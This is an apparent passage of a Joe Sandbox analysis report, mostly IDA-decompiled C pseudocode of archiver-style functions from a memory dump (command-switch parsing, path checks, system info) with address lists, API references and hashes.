								__eflags =  *(_t187 + 0x14);
								if( *(_t187 + 0x14) == 0) {
									L19:
									_push(_t185 + 0x60);
									_push(_t185 + 0x58);
									_t173 = 0x2c;
									_t124 = E00B38570( *((intOrPtr*)(_t187 + 8)), _t173);
									__eflags = _t124;
									if(_t124 == 0) {
										_push(_t187 + 0x17);
										_push(_t179);
										_t174 = 0x24;
										_t124 = E00B3861A( *((intOrPtr*)(_t187 + 8)), _t174);
										__eflags = _t124;
										if(_t124 == 0) {
											asm("adc eax, [edi+0x4]");
											 *((intOrPtr*)(_t187 + 0xc)) =  *((intOrPtr*)(_t187 + 0xc)) +  *_t179;
											_t159 =  *((intOrPtr*)(_t185 + 0x68));
											_t127 =  *(_t185 + 0x6c);
											asm("sbb edi, [ebp+0x10]");
											__eflags =  *(_t185 + 0x60);
											 *((intOrPtr*)(_t185 + 0x70)) = _t159 -  *((intOrPtr*)(_t187 + 0xc));
											 *(_t185 + 0x74) = _t127;
											if( *(_t185 + 0x60) != 0) {
												_t139 =  *((intOrPtr*)(_t185 + 0x58));
												_t177 =  *(_t185 + 0x5c);
												 *(_t187 - 0x10) = _t177;
												_t183 = _t139 +  *((intOrPtr*)(_t187 + 0xc));
												asm("adc edx, [ebp+0x10]");
												__eflags = _t177 - _t127;
												if(__eflags > 0) {
													L29:
													 *((char*)(_t185 + 0x79)) = 1;
												} else {
													if(__eflags < 0) {
														L25:
														 *((intOrPtr*)(_t185 + 0x70)) = _t139;
														 *((intOrPtr*)(_t185 + 0x88)) = _t159 - _t183;
														asm("sbb eax, edx");
														 *(_t185 + 0x74) =  *(_t187 - 0x10);
														 *((char*)(_t185 + 0x78)) = 1;
														 *(_t185 + 0x8c) = _t127;
													} else {
														__eflags = _t183 - _t159;
														if(_t183 >= _t159) {
															__eflags = _t177 - _t127;
															if(__eflags >= 0) {
																if(__eflags > 0) {
																	goto L29;
																} else {
																	__eflags = _t183 - _t159;
																	if(_t183 > _t159) {
																		goto L29;
																	}
																}
															}
														} else {
															goto L25;
														}
													}
												}
											}
											goto L30;
										}
									}
								} else {
									__eflags =  *(_t185 + 0x7b);
									if( *(_t185 + 0x7b) == 0) {
										L30:
										_t124 = 0;
										__eflags = 0;
									} else {
										__eflags =  *(_t185 + 0x7c) & 0x00000001;
										if(( *(_t185 + 0x7c) & 0x00000001) != 0) {
											goto L30;
										} else {
											goto L19;
										}
									}
								}
							} else {
								L00B19312(_t187 - 0x24);
								_t124 =  *(_t187 - 0x10);
							}
						} else {
							L00B19312(_t187 - 0x24);
							_t124 =  *(_t187 - 0x10);
						}
					} else {
						L00B19312(_t187 - 0x24);
						_t124 =  *(_t187 - 0x10);
					}
				} else {
					L00B19312(_t187 - 0x24);
					_t124 =  *(_t187 - 0x10);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t187 - 0xc));
				return _t124;
			}



























                                                                                                                    0x00b38308
                                                                                                                    0x00b38312
                                                                                                                    0x00b38320
                                                                                                                    0x00b38323
                                                                                                                    0x00b38326
                                                                                                                    0x00b38329
                                                                                                                    0x00b3832c
                                                                                                                    0x00b3832f
                                                                                                                    0x00b38331
                                                                                                                    0x00b38334
                                                                                                                    0x00b3833a
                                                                                                                    0x00b3833d
                                                                                                                    0x00b38342
                                                                                                                    0x00b38346
                                                                                                                    0x00b3834a
                                                                                                                    0x00b3834d
                                                                                                                    0x00b38359
                                                                                                                    0x00b3835c
                                                                                                                    0x00b38361
                                                                                                                    0x00b38364
                                                                                                                    0x00b38384
                                                                                                                    0x00b38387
                                                                                                                    0x00b3838c
                                                                                                                    0x00b38390
                                                                                                                    0x00b38394
                                                                                                                    0x00b38397
                                                                                                                    0x00b383a3
                                                                                                                    0x00b383aa
                                                                                                                    0x00b383ad
                                                                                                                    0x00b383af
                                                                                                                    0x00b383b2
                                                                                                                    0x00b383d1
                                                                                                                    0x00b383d7
                                                                                                                    0x00b383dc
                                                                                                                    0x00b383e0
                                                                                                                    0x00b383e4
                                                                                                                    0x00b383e7
                                                                                                                    0x00b383f3
                                                                                                                    0x00b383fa
                                                                                                                    0x00b383fd
                                                                                                                    0x00b383ff
                                                                                                                    0x00b38402
                                                                                                                    0x00b38414
                                                                                                                    0x00b38418
                                                                                                                    0x00b3841a
                                                                                                                    0x00b3841f
                                                                                                                    0x00b38422
                                                                                                                    0x00b38424
                                                                                                                    0x00b38424
                                                                                                                    0x00b38430
                                                                                                                    0x00b38430
                                                                                                                    0x00b38438
                                                                                                                    0x00b3843d
                                                                                                                    0x00b38441
                                                                                                                    0x00b38445
                                                                                                                    0x00b38448
                                                                                                                    0x00b38454
                                                                                                                    0x00b3845b
                                                                                                                    0x00b3845e
                                                                                                                    0x00b38460
                                                                                                                    0x00b38463
                                                                                                                    0x00b38475
                                                                                                                    0x00b38479
                                                                                                                    0x00b3847b
                                                                                                                    0x00b38480
                                                                                                                    0x00b38483
                                                                                                                    0x00b38485
                                                                                                                    0x00b38485
                                                                                                                    0x00b38491
                                                                                                                    0x00b38491
                                                                                                                    0x00b38496
                                                                                                                    0x00b3849d
                                                                                                                    0x00b384a2
                                                                                                                    0x00b384a5
                                                                                                                    0x00b384ba
                                                                                                                    0x00b384c0
                                                                                                                    0x00b384c4
                                                                                                                    0x00b384c7
                                                                                                                    0x00b384c8
                                                                                                                    0x00b384cd
                                                                                                                    0x00b384cf
                                                                                                                    0x00b384db
                                                                                                                    0x00b384dc
                                                                                                                    0x00b384df
                                                                                                                    0x00b384e0
                                                                                                                    0x00b384e5
                                                                                                                    0x00b384e7
                                                                                                                    0x00b384f1
                                                                                                                    0x00b384f4
                                                                                                                    0x00b384f7
                                                                                                                    0x00b384fd
                                                                                                                    0x00b38507
                                                                                                                    0x00b3850a
                                                                                                                    0x00b3850d
                                                                                                                    0x00b38510
                                                                                                                    0x00b38513
                                                                                                                    0x00b38515
                                                                                                                    0x00b38518
                                                                                                                    0x00b3851d
                                                                                                                    0x00b38520
                                                                                                                    0x00b38523
                                                                                                                    0x00b38526
                                                                                                                    0x00b38528
                                                                                                                    0x00b38559
                                                                                                                    0x00b38559
                                                                                                                    0x00b3852a
                                                                                                                    0x00b3852a
                                                                                                                    0x00b38530
                                                                                                                    0x00b38532
                                                                                                                    0x00b38538
                                                                                                                    0x00b3853e
                                                                                                                    0x00b38540
                                                                                                                    0x00b38543
                                                                                                                    0x00b38547
                                                                                                                    0x00b3852c
                                                                                                                    0x00b3852c
                                                                                                                    0x00b3852e
                                                                                                                    0x00b3854f
                                                                                                                    0x00b38551
                                                                                                                    0x00b38553
                                                                                                                    0x00000000
                                                                                                                    0x00b38555
                                                                                                                    0x00b38555
                                                                                                                    0x00b38557
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b38557
                                                                                                                    0x00b38553
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3852e
                                                                                                                    0x00b3852a
                                                                                                                    0x00b38528
                                                                                                                    0x00000000
                                                                                                                    0x00b38513
                                                                                                                    0x00b384e7
                                                                                                                    0x00b384a7
                                                                                                                    0x00b384a7
                                                                                                                    0x00b384aa
                                                                                                                    0x00b3855d
                                                                                                                    0x00b3855d
                                                                                                                    0x00b3855d
                                                                                                                    0x00b384b0
                                                                                                                    0x00b384b0
                                                                                                                    0x00b384b4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b384b4
                                                                                                                    0x00b384aa
                                                                                                                    0x00b38465
                                                                                                                    0x00b38468
                                                                                                                    0x00b3846d
                                                                                                                    0x00b3846d
                                                                                                                    0x00b38404
                                                                                                                    0x00b38407
                                                                                                                    0x00b3840c
                                                                                                                    0x00b3840c
                                                                                                                    0x00b383b4
                                                                                                                    0x00b383b7
                                                                                                                    0x00b383bc
                                                                                                                    0x00b383bc
                                                                                                                    0x00b38366
                                                                                                                    0x00b38369
                                                                                                                    0x00b3836e
                                                                                                                    0x00b3836e
                                                                                                                    0x00b38565
                                                                                                                    0x00b3856d

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B38308
                                                                                                                      • Part of subcall function 00B19312: VariantClear.OLEAUT32(?), ref: 00B19334
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearH_prologVariant
                                                                                                                    • String ID: Unknown error$Unknown warning
                                                                                                                    • API String ID: 1166855276-4291957651
                                                                                                                    • Opcode ID: ed0b799436fcd3c211e8542727e4fd75cfeb34ffc2c3c0c862115add47273653
                                                                                                                    • Instruction ID: c44199f7b1ad0840c8cde6c5dc5a25180ee8f2cabfe663e3b80ce1ab3df6fd2f
                                                                                                                    • Opcode Fuzzy Hash: ed0b799436fcd3c211e8542727e4fd75cfeb34ffc2c3c0c862115add47273653
                                                                                                                    • Instruction Fuzzy Hash: 5E813871900709DBCB14DFA8C4909EEB7F1FF58304F6089ADE066A7691DB70AE48CB55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B222C8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 88%
                                                                                                                    			E00B222C8(void* __ecx, intOrPtr* __edx) {
				void* __edi;
				signed int _t73;
				void* _t87;
				void* _t90;
				void* _t95;
				void* _t101;
				signed int _t116;
				signed int _t128;
				signed int _t136;
				intOrPtr _t140;
				signed char* _t143;
				intOrPtr* _t155;
				void* _t162;
				void* _t164;
				void* _t165;

				L00B7F140(0xb836be, _t162);
				_t165 = _t164 - 0xc0;
				 *(_t162 - 0x10) =  *(_t162 - 0x10) & 0x00000000;
				_t155 = __edx;
				_t143 = __ecx;
				 *((intOrPtr*)(_t162 - 0x14)) = __edx;
				 *(_t162 - 0x18) = __ecx;
				if( *((intOrPtr*)(__edx + 4)) <= 0) {
					L19:
					_t73 =  *(_t162 - 0x10);
					_t171 = _t73 -  *((intOrPtr*)(_t155 + 4));
					if(_t73 !=  *((intOrPtr*)(_t155 + 4))) {
						_push( *((intOrPtr*)( *((intOrPtr*)( *_t155 + _t73 * 4)))));
						_push("incorrect update switch command");
						E00B30B3C(_t162 - 0x30, _t171);
						_t73 = _t162 - 0x30;
						_push(0xb91428);
						_push(_t73);
						L00B7F160();
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t162 - 0xc));
					return _t73;
				} else {
					goto L1;
				}
				do {
					L1:
					_t140 =  *0xb89ca8; // 0xb89630
					_t109 =  *((intOrPtr*)( *_t155 +  *(_t162 - 0x10) * 4));
					if(E00B123F5( *((intOrPtr*)( *((intOrPtr*)( *_t155 +  *(_t162 - 0x10) * 4)))), _t140) == 0) {
						_t116 = 7;
						memcpy(_t162 - 0x4c,  *(_t162 + 8), _t116 << 2);
						_t165 = _t165 + 0xc;
						E00B12D90(_t162 - 0x24);
						 *(_t162 - 4) = 0;
						__eflags = E00B224BB(_t109, _t162 - 0x4c, _t162 - 0x24);
						if(__eflags == 0) {
							 *(_t162 - 4) =  *(_t162 - 4) | 0xffffffff;
							_push( *((intOrPtr*)(_t162 - 0x24)));
							L16:
							E00B11E89(_t81);
							L18:
							_t155 =  *((intOrPtr*)(_t162 - 0x14));
							goto L19;
						}
						__eflags =  *(_t162 - 0x20);
						if( *(_t162 - 0x20) != 0) {
							_t81 =  *((intOrPtr*)(_t162 - 0x24));
							__eflags =  *_t81 - 0x21;
							if( *_t81 != 0x21) {
								_t55 = _t162 - 4;
								 *_t55 =  *(_t162 - 4) | 0xffffffff;
								__eflags =  *_t55;
								_push(_t81);
								goto L16;
							}
							E00B12D90(_t162 - 0xcc);
							 *(_t162 - 4) = 1;
							E00B22203(_t162 - 0xc0);
							 *(_t162 - 4) = 2;
							_t87 = E00B12DD3(_t162 - 0x30,  *((intOrPtr*)(_t162 - 0x24)) + 2);
							__eflags =  *(_t162 - 0x2c);
							 *(_t162 - 4) = 3;
							if( *(_t162 - 0x2c) == 0) {
								E00B11E89(_t87,  *(_t162 - 0x30));
								_t90 = E00B11E89(E00B22274(_t162 - 0xc0),  *((intOrPtr*)(_t162 - 0xcc)));
								_t61 = _t162 - 4;
								 *_t61 =  *(_t162 - 4) | 0xffffffff;
								__eflags =  *_t61;
								E00B11E89(_t90,  *((intOrPtr*)(_t162 - 0x24)));
								goto L18;
							}
							L00B12F78(_t162 - 0xcc, _t162 - 0x30);
							_t128 = 7;
							_t95 = memcpy(_t162 - 0x68, _t162 - 0x4c, _t128 << 2);
							_t165 = _t165 + 0xc;
							E00B56B33(_t95 + 0x58);
							_push(_t162 - 0xcc);
							E00B11E89(E00B22902(_t95 + 0x58, _t162 - 0x4c + _t128 + _t128),  *(_t162 - 0x30));
							_t101 = E00B11E89(E00B22274(_t162 - 0xc0),  *((intOrPtr*)(_t162 - 0xcc)));
							L11:
							_t44 = _t162 - 4;
							 *_t44 =  *(_t162 - 4) | 0xffffffff;
							__eflags =  *_t44;
							E00B11E89(_t101,  *((intOrPtr*)(_t162 - 0x24)));
							_t155 =  *((intOrPtr*)(_t162 - 0x14));
							_t143 =  *(_t162 - 0x18);
							goto L12;
						}
						_t101 =  *(_t162 - 0x18);
						__eflags =  *_t101;
						if( *_t101 != 0) {
							_t136 = 7;
							_t101 = memcpy( *((intOrPtr*)( *((intOrPtr*)(_t101 + 0x58)))) + 0x64, _t162 - 0x4c, _t136 << 2);
							_t165 = _t165 + 0xc;
						}
						goto L11;
					} else {
						if( *_t143 != 0) {
							 *_t143 =  *_t143 & 0x00000000;
							E00B227BC( &(_t143[0x58]), 0);
						}
					}
					L12:
					 *(_t162 - 0x10) =  *(_t162 - 0x10) + 1;
				} while ( *(_t162 - 0x10) <  *((intOrPtr*)(_t155 + 4)));
				goto L19;
			}


















                                                                                                                    0x00b222cd
                                                                                                                    0x00b222d2
                                                                                                                    0x00b222d8
                                                                                                                    0x00b222de
                                                                                                                    0x00b222e1
                                                                                                                    0x00b222e7
                                                                                                                    0x00b222ea
                                                                                                                    0x00b222ed
                                                                                                                    0x00b22480
                                                                                                                    0x00b22480
                                                                                                                    0x00b22483
                                                                                                                    0x00b22486
                                                                                                                    0x00b22490
                                                                                                                    0x00b22492
                                                                                                                    0x00b22497
                                                                                                                    0x00b2249c
                                                                                                                    0x00b2249f
                                                                                                                    0x00b224a4
                                                                                                                    0x00b224a5
                                                                                                                    0x00b224a5
                                                                                                                    0x00b224b0
                                                                                                                    0x00b224b8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b222f3
                                                                                                                    0x00b222f3
                                                                                                                    0x00b222f8
                                                                                                                    0x00b222fe
                                                                                                                    0x00b2230a
                                                                                                                    0x00b2232c
                                                                                                                    0x00b22330
                                                                                                                    0x00b22330
                                                                                                                    0x00b22335
                                                                                                                    0x00b22345
                                                                                                                    0x00b2234d
                                                                                                                    0x00b2234f
                                                                                                                    0x00b2243b
                                                                                                                    0x00b2243f
                                                                                                                    0x00b22449
                                                                                                                    0x00b22449
                                                                                                                    0x00b2247c
                                                                                                                    0x00b2247c
                                                                                                                    0x00000000
                                                                                                                    0x00b2247f
                                                                                                                    0x00b22355
                                                                                                                    0x00b22358
                                                                                                                    0x00b2237b
                                                                                                                    0x00b2237e
                                                                                                                    0x00b22382
                                                                                                                    0x00b22444
                                                                                                                    0x00b22444
                                                                                                                    0x00b22444
                                                                                                                    0x00b22448
                                                                                                                    0x00000000
                                                                                                                    0x00b22448
                                                                                                                    0x00b2238e
                                                                                                                    0x00b22399
                                                                                                                    0x00b2239d
                                                                                                                    0x00b223ab
                                                                                                                    0x00b223b0
                                                                                                                    0x00b223b5
                                                                                                                    0x00b223b8
                                                                                                                    0x00b223bc
                                                                                                                    0x00b22453
                                                                                                                    0x00b2246a
                                                                                                                    0x00b22472
                                                                                                                    0x00b22472
                                                                                                                    0x00b22472
                                                                                                                    0x00b22476
                                                                                                                    0x00000000
                                                                                                                    0x00b2247b
                                                                                                                    0x00b223cc
                                                                                                                    0x00b223dc
                                                                                                                    0x00b223dd
                                                                                                                    0x00b223dd
                                                                                                                    0x00b223e4
                                                                                                                    0x00b223f1
                                                                                                                    0x00b223fa
                                                                                                                    0x00b22411
                                                                                                                    0x00b22417
                                                                                                                    0x00b2241a
                                                                                                                    0x00b2241a
                                                                                                                    0x00b2241a
                                                                                                                    0x00b2241e
                                                                                                                    0x00b22423
                                                                                                                    0x00b22426
                                                                                                                    0x00000000
                                                                                                                    0x00b22429
                                                                                                                    0x00b2235a
                                                                                                                    0x00b2235d
                                                                                                                    0x00b22360
                                                                                                                    0x00b2236b
                                                                                                                    0x00b22374
                                                                                                                    0x00b22374
                                                                                                                    0x00b22374
                                                                                                                    0x00000000
                                                                                                                    0x00b2230c
                                                                                                                    0x00b2230f
                                                                                                                    0x00b22315
                                                                                                                    0x00b2231d
                                                                                                                    0x00b2231d
                                                                                                                    0x00b2230f
                                                                                                                    0x00b2242a
                                                                                                                    0x00b2242a
                                                                                                                    0x00b22430
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B222CD
                                                                                                                    • _CxxThrowException.MSVCRT(?,00B91428), ref: 00B224A5
                                                                                                                      • Part of subcall function 00B11E89: free.MSVCRT(?,00B36CD6,00000000,00000000,00000001,?,00B110EB), ref: 00B11E8D
                                                                                                                    Strings
                                                                                                                    • incorrect update switch command, xrefs: 00B22492
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionH_prologThrowfree
                                                                                                                    • String ID: incorrect update switch command
                                                                                                                    • API String ID: 2564996034-2497410926
                                                                                                                    • Opcode ID: 9314c4d20d9201297fb30383d9ac32bd7b3286836f45b5dfd83da89ac42edfb1
                                                                                                                    • Instruction ID: da409189c11dee19d8ca28b9feec08ffb51113b7b9806ffcc6b8432862b0f1d4
                                                                                                                    • Opcode Fuzzy Hash: 9314c4d20d9201297fb30383d9ac32bd7b3286836f45b5dfd83da89ac42edfb1
                                                                                                                    • Instruction Fuzzy Hash: 11514832D00229EBDF15EB94E841AEDB7F5EF04310F6041D9E529B72A1DB746E85CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B1A0B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B1A0B6(void* __ecx, void* __eflags) {
				void* __edi;
				void* _t47;
				void* _t49;
				void* _t52;
				void* _t53;
				void* _t84;
				void* _t89;

				_t95 = __eflags;
				L00B7F140(0xb83148, _t89);
				_t84 = __ecx;
				L00B19F47(__ecx, __ecx, __eflags);
				E00B1287D();
				E00B126D9(_t89 - 0x24);
				 *(_t89 - 4) = 0;
				E00B126D9(_t89 - 0x30);
				 *(_t89 - 4) = 1;
				E00B126D9(_t89 - 0x18);
				_t82 = _t89 - 0x18;
				 *(_t89 - 4) = 2;
				L00B199D7(_t89 - 0x30, _t89 - 0x18, _t95);
				if( *((intOrPtr*)(_t89 - 0x2c)) != 0 ||  *((intOrPtr*)(_t89 - 0x14)) != 0) {
					E00B127B7(_t89 - 0x24, _t89 - 0x30);
					if( *((intOrPtr*)(_t89 - 0x2c)) !=  *((intOrPtr*)(_t89 - 0x14)) || strcmp( *(_t89 - 0x30),  *(_t89 - 0x18)) != 0) {
						_t100 =  *((intOrPtr*)(_t89 - 0x14));
						if( *((intOrPtr*)(_t89 - 0x14)) != 0) {
							E00B12895(_t89 - 0x24, " - ");
							E00B128EE(_t89 - 0x24, _t100, _t89 - 0x18);
						}
					}
				}
				_t47 = L00B19F00(_t89 - 0x24);
				_t101 =  *((intOrPtr*)(_t89 - 0x20));
				if( *((intOrPtr*)(_t89 - 0x20)) != 0) {
					E00B128EE(_t84, _t101, _t89 - 0x24);
					_t47 = E00B1287D();
				}
				_t49 = E00B11E89(E00B11E89(_t47,  *(_t89 - 0x18)),  *(_t89 - 0x30));
				 *(_t89 - 4) =  *(_t89 - 4) | 0xffffffff;
				E00B11E89(_t49,  *((intOrPtr*)(_t89 - 0x24)));
				E00B126D9(_t89 - 0x3c);
				 *(_t89 - 4) = 3;
				_t52 = E00B1A1D3(_t89 - 0x3c, _t82, _t101);
				_t102 =  *((intOrPtr*)(_t89 - 0x38));
				if( *((intOrPtr*)(_t89 - 0x38)) != 0) {
					E00B128EE(_t84, _t102, _t89 - 0x3c);
					_t52 = E00B1287D();
				}
				_t53 = E00B11E89(_t52,  *((intOrPtr*)(_t89 - 0x3c)));
				 *[fs:0x0] =  *((intOrPtr*)(_t89 - 0xc));
				return _t53;
			}










                                                                                                                    0x00b1a0b6
                                                                                                                    0x00b1a0bb
                                                                                                                    0x00b1a0c5
                                                                                                                    0x00b1a0c7
                                                                                                                    0x00b1a0ce
                                                                                                                    0x00b1a0d6
                                                                                                                    0x00b1a0e0
                                                                                                                    0x00b1a0e3
                                                                                                                    0x00b1a0eb
                                                                                                                    0x00b1a0ef
                                                                                                                    0x00b1a0f4
                                                                                                                    0x00b1a0fa
                                                                                                                    0x00b1a0fe
                                                                                                                    0x00b1a106
                                                                                                                    0x00b1a114
                                                                                                                    0x00b1a11f
                                                                                                                    0x00b1a132
                                                                                                                    0x00b1a135
                                                                                                                    0x00b1a13f
                                                                                                                    0x00b1a14b
                                                                                                                    0x00b1a14b
                                                                                                                    0x00b1a135
                                                                                                                    0x00b1a11f
                                                                                                                    0x00b1a153
                                                                                                                    0x00b1a158
                                                                                                                    0x00b1a15b
                                                                                                                    0x00b1a163
                                                                                                                    0x00b1a16a
                                                                                                                    0x00b1a16a
                                                                                                                    0x00b1a17a
                                                                                                                    0x00b1a182
                                                                                                                    0x00b1a186
                                                                                                                    0x00b1a191
                                                                                                                    0x00b1a199
                                                                                                                    0x00b1a1a0
                                                                                                                    0x00b1a1a5
                                                                                                                    0x00b1a1a8
                                                                                                                    0x00b1a1b0
                                                                                                                    0x00b1a1b7
                                                                                                                    0x00b1a1b7
                                                                                                                    0x00b1a1bf
                                                                                                                    0x00b1a1ca
                                                                                                                    0x00b1a1d2

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B1A0BB
                                                                                                                      • Part of subcall function 00B19F47: __EH_prolog.LIBCMT ref: 00B19F4C
                                                                                                                      • Part of subcall function 00B199D7: GetSystemInfo.KERNEL32(?), ref: 00B199F9
                                                                                                                      • Part of subcall function 00B199D7: GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 00B19A13
                                                                                                                      • Part of subcall function 00B199D7: GetProcAddress.KERNEL32(00000000), ref: 00B19A1A
                                                                                                                    • strcmp.MSVCRT ref: 00B1A127
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$AddressHandleInfoModuleProcSystemstrcmp
                                                                                                                    • String ID: -
                                                                                                                    • API String ID: 2798778560-3695764949
                                                                                                                    • Opcode ID: 33e61a7fe99f24fa8aef24b5c9bc89e36ccbbd477ea6eb7b8461fa9f38dc8032
                                                                                                                    • Instruction ID: fd612aa8e3915e6946cebebb480fc952ce10bab84213cd65cc681964fa76acbf
                                                                                                                    • Opcode Fuzzy Hash: 33e61a7fe99f24fa8aef24b5c9bc89e36ccbbd477ea6eb7b8461fa9f38dc8032
                                                                                                                    • Instruction Fuzzy Hash: B7315831C02109ABCF15FBE4D8529EDF7F5AF55710F9040A9F401B2191EB306E99DBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B14DAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 86%
                                                                                                                    			E00B14DAE(intOrPtr* __ecx) {
				intOrPtr* _t16;
				void* _t17;
				intOrPtr _t26;
				void* _t33;
				intOrPtr _t37;
				intOrPtr* _t48;

				_t48 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					L4:
					return 0;
				}
				if(E00B14A8C( *((intOrPtr*)( *((intOrPtr*)( *__ecx))))) != 0) {
					L2:
					_push(1);
					L15:
					_pop(_t17);
					return _t17;
				}
				_t16 =  *__ecx;
				if( *((intOrPtr*)( *_t16 + 4)) != 0) {
					goto L4;
				}
				_t37 =  *((intOrPtr*)(__ecx + 4));
				if(_t37 == 1 ||  *((intOrPtr*)( *((intOrPtr*)(_t16 + 4)) + 4)) != 0) {
					goto L2;
				}
				_t33 = 2;
				if(_t37 == _t33) {
					L18:
					return _t33;
				}
				if(wcscmp( *( *(_t16 + 8)), 0xb89394) == 0) {
					L14:
					_push(3);
					goto L15;
				}
				if(wcscmp( *( *( *_t48 + 8)), 0xb8938c) == 0) {
					if( *((intOrPtr*)(_t48 + 4)) == 3) {
						goto L14;
					}
					if(E00B14A8C( *((intOrPtr*)( *((intOrPtr*)( *_t48 + 0xc))))) != 0) {
						_push(4);
						goto L15;
					}
					if(E00B12450( *((intOrPtr*)( *((intOrPtr*)( *_t48 + 0xc)))), "UNC") == 0) {
						goto L14;
					}
					_t33 = 4;
				}
				_t26 =  *((intOrPtr*)(_t48 + 4));
				_t33 = _t33 + 1;
				if(_t26 > _t33) {
					goto L18;
				}
				return _t26;
			}









                                                                                                                    0x00b14db1
                                                                                                                    0x00b14db8
                                                                                                                    0x00b14dd9
                                                                                                                    0x00000000
                                                                                                                    0x00b14dd9
                                                                                                                    0x00b14dc7
                                                                                                                    0x00b14dc9
                                                                                                                    0x00b14dc9
                                                                                                                    0x00b14e56
                                                                                                                    0x00b14e56
                                                                                                                    0x00000000
                                                                                                                    0x00b14e56
                                                                                                                    0x00b14dd0
                                                                                                                    0x00b14dd7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b14de0
                                                                                                                    0x00b14de6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b14df2
                                                                                                                    0x00b14df5
                                                                                                                    0x00b14e64
                                                                                                                    0x00000000
                                                                                                                    0x00b14e64
                                                                                                                    0x00b14e0e
                                                                                                                    0x00b14e54
                                                                                                                    0x00b14e54
                                                                                                                    0x00000000
                                                                                                                    0x00b14e54
                                                                                                                    0x00b14e23
                                                                                                                    0x00b14e29
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b14e39
                                                                                                                    0x00b14e3b
                                                                                                                    0x00000000
                                                                                                                    0x00b14e3b
                                                                                                                    0x00b14e52
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b14e5b
                                                                                                                    0x00b14e5b
                                                                                                                    0x00b14e5c
                                                                                                                    0x00b14e5f
                                                                                                                    0x00b14e62
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b14e69

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
